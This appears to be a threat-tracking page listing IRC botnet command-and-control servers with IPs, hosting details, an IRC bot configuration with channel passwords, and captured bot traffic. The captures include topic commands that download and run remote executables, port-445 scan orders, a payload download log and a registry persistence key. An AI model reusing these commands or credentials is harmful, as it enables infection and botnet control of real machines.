var $config = array(“server”=>”213.165.70.210”, “port”=>”6667”, “pass”=>””, “prefix”=>”psychoz`x`”, “maxrand”=>”4”, “chan”=>”#!scann”, “chan2″=>”#2”, “key”=>”kimi”, “modes”=>”+p”, “password”=>”2002”, “trigger”=>”.”, “hostauth”=>”*” // infos about hosting: http://whois.domaintools.com/213.165.70.210
343.no-ip.info(canadian hecker using rat Canada Burnaby Telus Communications Inc)
343.no-ip.info 207.216.86.42 Outgoing connection to remote server: 343.no-ip.info TCP port 3998 Outgoing connection to remote server: 343.no-ip.info TCP port 3998 infos about hecker location: http://whois.domaintools.com/207.216.86.42
91.215.159.137(botnet hosted in Netherlands Amsterdam Infinite Technologies Internet Solutions Limited)
Remote Host Port Number 204.0.5.41 80 216.178.38.224 80 216.178.39.11 80 66.220.149.18 80 91.215.159.137 1866 PASS xxx MODE NEW-[USA|00|P|85802] -ix JOIN #!high! test PONG 22 MOTD NICK NEW-[USA|00|P|85802] USER XP-0865 * 0 :COMPUTERNAME infos about hosting: http://whois.domaintools.com/91.215.159.137
178.162.151.112(botnet hosted in Germany Berlin Idealhosting Managed Servers)
Remote Host Port Number 178.162.151.112 5858 PASS ciaxx MODE [USA|XP|012963] -ix JOIN #cia ciaxxx PRIVMSG #cia :DDoS: Thread Disabled. PONG www.xxx.com NICK [USA|XP|012963] USER kjvpaoq * 0 :COMPUTERNAME infos about hosting: http://whois.domaintools.com/178.162.151.112
188.132.196.171(botnet hosted in Turkey Mars-customer)
Remote Host Port Number 188.132.196.171 4411 PASS ciaxx NICK n{Ganja-USA|XP}169603 USER 1696 “” “TsGh” :1696 JOIN #ozel1 ciaxxx PONG :HTTP1.4 infos about hosting: http://whois.domaintools.com/188.132.196.171
92.241.165.156(botnet hosted in Russian Federation 2×4.ru Network)
92.241.165.156:1234 Nick: NEW-[AUT|00|P|66839] Username: XP-2398 Server Pass: xxx Joined Channel: #!nn! with Password test Channel Topic for Channel #!nn!: “D http://tygillmor.com/index.php?=” * Now talking in #!nn! * Topic is ‘.m.s|.m.e hahhahaha foto 😀 http://ialongsdor.net/facebook/index.php?= ‘ * Set by wd22 on Tue Apr 05 13:09:13 infos about hosting: http://whois.domaintools.com/92.241.165.156
62.213.4.174(botnet hosted in Russian Federation Moscow Samtel)
Remote Host Port Number 62.213.4.174 13001 NICK `hljvmflr USER `hljvmflr 0 0 :`hljvmflr JOIN #.serve6 hs USERHOST `hljvmflr PRIVMSG #.serve6 :scan(asn): random port scan 192.x.x.x:445 [delay 5 sec] [0 min] [100 threads] * Now talking in #.serve6 * Topic is ‘`adv.start asn 100 5 0 -a -r ‘ * Set by sd on Sun AprRead more...
hahahaha.ishtiben.com(botnet hosted in China Beijing Chinanet Jiangxi Province Network)
botnet C&C irc hahahaha.ishtiben.com DNS_TYPE_A 60.190.218.104 123.183.217.32 59.63.157.62 60.190.218.104:7196 Now talking in #! Topic is ‘.asc -S|.http http://194.28.44.208/new1.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a|.r.getfile -S|.r.getfile http://194.28.44.208/m.exe C:xdx.exe 1 -s’ HKLM​SOFTWARE​Microsoft​Windows​CurrentVer!​policies​Explorer​Run​ Microsoft DriverRead more...
aminizakoycam.co.cc(botnet hosted in Turkey Engin Rencber)
Remote Host Port Number 178.162.158.138 6667 PASS timu 74.86.183.197 80 MODE USA|86530 -x+i JOIN #1 timu USERHOST USA|86530 PRIVMSG #1 :- download – Downloading URL: http://www.freeflow.in/am2.exe to: c:/am2.exe. – downloaded 96.5 KB to c:/am2.exe @ 96.5 KB/sec – opened c:/am2.exe NICK USA|86530 USER ppdqhcd 0 0 :USA|86530 NICK [USA|XP|539487] USER srmyidk * 0 :COMPUTERNAME infosRead more...
onlinedatingsecretfriends.com(gbot hosted in United States Austin Road Runner Holdco Llc)
folusho.com 67.222.55.143 127.0.0.1 127.0.0.1 hostinganddedic.com 188.72.230.129 searchmobilecode.com zonetf.com www.google.com 74.125.77.147 www.yahoo.com 87.248.122.122 Opened listening TCP connection on port: 62970 Outgoing connection to remote server: folusho.com TCP port 80 Outgoing connection to remote server: hostinganddedic.com TCP port 80 Outgoing connection to remote server: www.google.com TCP port 80 Outgoing connection to remote server: www.yahoo.com TCP port 80Read more...